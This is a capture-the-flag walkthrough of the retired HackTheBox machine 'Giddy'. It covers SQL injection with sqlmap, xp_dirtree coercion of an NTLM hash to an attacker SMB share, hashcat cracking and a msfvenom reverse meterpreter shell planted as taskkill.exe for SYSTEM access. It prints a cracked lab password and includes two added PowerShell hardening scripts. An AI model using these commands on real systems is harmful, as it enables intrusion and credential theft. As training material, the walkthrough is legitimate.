Giddy is a retired machine on HackTheBox. Its difficulty level is ranked as Medium and it has received a 4.9/5 rating from its users.
As usual, I started off with a port scan. Nmap quickly revealed that ports 80, 443, 3389, and 5985 were open.
Web sites are often the easiest targets, so that’s where I began.
While browsing the website, I decided to run a fuzzing tool in the background. This kind of tool brute-forces directory and file names and reports what it finds. Although ffuf is usually my tool of choice, I decided to use dirbuster this time. Dirbuster offers a GUI, automatically searches directories recursively, and is easy to use.
Dirbuster revealed two new directories not found on the default page: /remote and /mvc.
I first explored /remote, but after a few unsuccessful attempts at SQL Injection and password guessing, I shifted my focus to /mvc.
The URL http://10.10.10.104/mvc offered an eCommerce website that presented a larger attack surface. It didn’t take long to discover the site was vulnerable to SQL Injection. This became apparent when appending an apostrophe to the value of the ProductSubCategoryId parameter in the URL:
https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26'
Rather than manually injecting a payload, I used sqlmap, an excellent tool that injects various payload queries to access the database.
sqlmap -u https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26 -p ProductSubCategoryId --batch
For sqlmap, I used ‘-u’ to specify the URL where I discovered the potential injection and ‘-p’ for the parameter to be tested. The ‘--batch’ option automatically answers sqlmap’s prompts with default responses. Providing as much information as possible, like the parameter and database type (e.g., MySQL, MSSQL, Postgres, etc.), allows the tool to narrow down its queries, providing faster results and reducing bandwidth usage (and log traces!).
Once sqlmap confirmed the vulnerability of the parameter, I used it to open an interactive SQL shell:
sqlmap -u https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26 --sql-shell
I first started by checking the database for useful information, like usernames and passwords, but there was nothing of interest. Realizing the database was MSSQL (not previously known to me), I decided to see if I could use xp_dirtree.
According to hacktricks, “The xp_dirtree stored procedure, for instance, is used to make network requests, but it’s limited to only TCP port 445. The port number isn’t modifiable, but it allows reading from network shares.”
When attempting to connect to an SMB share, Windows automatically authenticates with the username and NetNTLMv2 challenge-response hash of the account SQL Server is running as. This hash can be cracked offline using tools like Hashcat or John The Ripper.
I started by setting up an Impacket smbserver on my machine.
impacket-smbserver secret /tmp -smb2support
Impacket is an excellent suite of networking tools for testing Active Directory in Windows machines. In my command, ‘secret’ is the name of my share, ‘/tmp’ is the directory it points to, and ‘-smb2support’ enables smb2 support.
Once my smbserver was ready, I executed my xp_dirtree command within the sqlmap shell:
exec master.dbo.xp_dirtree '\\10.10.14.9\secret'
This provided exactly what I needed. So, I captured the hash and used Hashcat to crack the password:
hashcat.exe -m 5600 -d 2 -a 0 C:\Users\Justin\Desktop\stacy.txt C:\tools\SecLists\Passwords\Leaked-Databases\rockyou.txt\rockyou.txt
The flags for Hashcat were: ‘-m 5600’ for the NetNTLMv2 hash type (great resource to find the id of your hash: Hashcat Examples Wiki), ‘-d 2’ to use my GPU (ideal for password cracking), ‘-a 0’ for a dictionary attack mode, and the path to my password file, rockyou.txt, a list of over 14 million passwords from leaked databases.
I successfully cracked Stacy’s password:
stacy:xNnWo6272k7x
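The xp_dirtree call above worked because the procedure is executable by the public role by default, so an injected query is enough to make the SQL Server service account authenticate to a share the attacker controls. The following PowerShell is an added example (not from the writeup) that audits that grant on an instance and, with -Fix, denies it to public; the instance name is a placeholder and the script assumes System.Data.SqlClient is available.

```powershell
# Added example: audit which principals can execute xp_dirtree in master and,
# with -Fix, deny it to 'public'. Instance name below is a placeholder (assumption).
param(
    [string]$ServerInstance = 'SQLSERVER-PLACEHOLDER',
    [switch]$Fix
)
Add-Type -AssemblyName System.Data
$conn = New-Object System.Data.SqlClient.SqlConnection(
    "Server=$ServerInstance;Database=master;Integrated Security=True;Encrypt=True;TrustServerCertificate=True")
$conn.Open()
try {
    # Who holds EXECUTE on xp_dirtree? A GRANT to 'public' means any login,
    # including one reached through SQL injection, can trigger outbound SMB auth.
    $audit = $conn.CreateCommand()
    $audit.CommandText = @"
SELECT pr.name AS grantee, pe.state_desc, pe.permission_name
FROM sys.database_permissions pe
JOIN sys.database_principals pr ON pr.principal_id = pe.grantee_principal_id
WHERE pe.major_id = OBJECT_ID('dbo.xp_dirtree')
"@
    $rdr = $audit.ExecuteReader()
    $grants = @()
    while ($rdr.Read()) {
        $grants += [pscustomobject]@{ Grantee = $rdr['grantee']; State = $rdr['state_desc']; Perm = $rdr['permission_name'] }
    }
    $rdr.Close()
    $grants | Format-Table -AutoSize
    $publicCanExec = $grants | Where-Object { $_.Grantee -eq 'public' -and $_.State -like 'GRANT*' -and $_.Perm -eq 'EXECUTE' }
    if ($publicCanExec) {
        Write-Warning 'xp_dirtree is executable by public: any SQL login can make the service account authenticate to a UNC path.'
        if ($Fix) {
            $deny = $conn.CreateCommand()
            $deny.CommandText = 'DENY EXECUTE ON dbo.xp_dirtree TO public;'
            [void]$deny.ExecuteNonQuery()
            Write-Host 'EXECUTE on xp_dirtree denied to public.'
        }
    } else {
        Write-Host 'public has no EXECUTE grant on xp_dirtree.'
    }
} finally {
    $conn.Close()
}
```

Denying public does not restrain sysadmin logins, so the complementary controls are fixing the injection itself with a parameterized query and blocking outbound TCP 445 from the database host.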
With credentials, I decided to use evil-winrm to connect to port 5985.
evil-winrm -i 10.10.10.104 -u stacy
A quick enumeration led me to a folder in Stacy’s Documents named “unifivideo”. A search on exploit-db.com revealed a local privilege escalation exploit: https://www.exploit-db.com/exploits/43390
This exploit reveals that when the Ubiquiti services start or stop, they look for an executable named “taskkill.exe” in the C:\ProgramData\unifi-video\ directory, which doesn’t exist by default. Because the unifi-video directory inherits the permissions of its parent, C:\ProgramData, all users have read and write access to it. This enables us to upload a malicious file, name it “taskkill.exe”, and place it in the expected directory. The service responsible for stopping the process, avService.exe, runs as NT AUTHORITY\SYSTEM, so when it launches our payload it runs with the highest permissions on a Windows machine.
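The root cause described above is an inherited ACL that lets any local user create files in a directory a SYSTEM service executes from. The following PowerShell is an added example (not from the writeup or the vendor) that reports write-capable entries for broad groups on that directory and, with -Harden, replaces the inherited ACL with a SYSTEM/Administrators-only one; the path is the one named in the advisory, and the chosen replacement ACL is my assumption about what a service data directory needs.

```powershell
# Added example: find out who can drop files into the directory the Ubiquiti
# service searches for taskkill.exe, and optionally replace the inherited ACL.
param(
    [string]$Path = 'C:\ProgramData\unifi-video',   # directory named in the advisory
    [switch]$Harden
)
if (-not (Test-Path -LiteralPath $Path)) { throw "Directory not found: $Path" }
$acl = Get-Acl -LiteralPath $Path
# Any of these rights lets a user create a new executable in the directory.
$writeRights = [System.Security.AccessControl.FileSystemRights]'CreateFiles, WriteData, AppendData, Write, Modify, FullControl'
# Principals that stand for "every local user" rather than an admin or a service account.
$broad = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$risky = $acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    ($_.FileSystemRights -band $writeRights) -ne 0 -and
    $broad -contains $_.IdentityReference.Value
}
if ($risky) {
    Write-Warning "$Path is writable by non-administrators (inherits from parent: $(-not $acl.AreAccessRulesProtected)):"
    $risky | Select-Object IdentityReference, FileSystemRights, IsInherited | Format-Table -AutoSize
} else {
    Write-Host "$Path grants no write access to broad groups."
}
if ($Harden -and $risky) {
    # Stop inheriting from C:\ProgramData and drop the explicit entries, then add only what is needed.
    $acl.SetAccessRuleProtection($true, $false)   # isProtected=$true, preserveInheritance=$false
    foreach ($rule in @($acl.Access | Where-Object { -not $_.IsInherited })) { [void]$acl.RemoveAccessRule($rule) }
    $inherit   = [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'
    $propagate = [System.Security.AccessControl.PropagationFlags]::None
    foreach ($id in 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators') {
        $acl.AddAccessRule((New-Object System.Security.AccessControl.FileSystemAccessRule($id, 'FullControl', $inherit, $propagate, 'Allow')))
    }
    # Ordinary users keep read access, which is all a data directory normally requires (assumption).
    $acl.AddAccessRule((New-Object System.Security.AccessControl.FileSystemAccessRule('BUILTIN\Users', 'ReadAndExecute', $inherit, $propagate, 'Allow')))
    Set-Acl -LiteralPath $Path -AclObject $acl
    Write-Host "ACL on $Path replaced; re-run without -Harden to verify."
}
```

Run it elevated; tightening the ACL is a stop-gap until the software is updated, since the service still searches that path for taskkill.exe.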
I created a reverse meterpreter shell using msfvenom, named it “taskkill.exe”, and uploaded it to the C:\ProgramData\unifi-video directory.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f exe -o taskkill.exe
I set up a handler to receive the callback from the reverse shell, gaining access to the victim machine.
After setting up the handler, I returned to Stacy’s account and ran get-service “Ubiquiti Unifi Video” to check the service’s status. Then, I executed Stop-Service “Ubiquiti Unifi Video” to trigger the reverse shell.
I now had access as the NT AUTHORITY\SYSTEM account and was able to retrieve the root flag!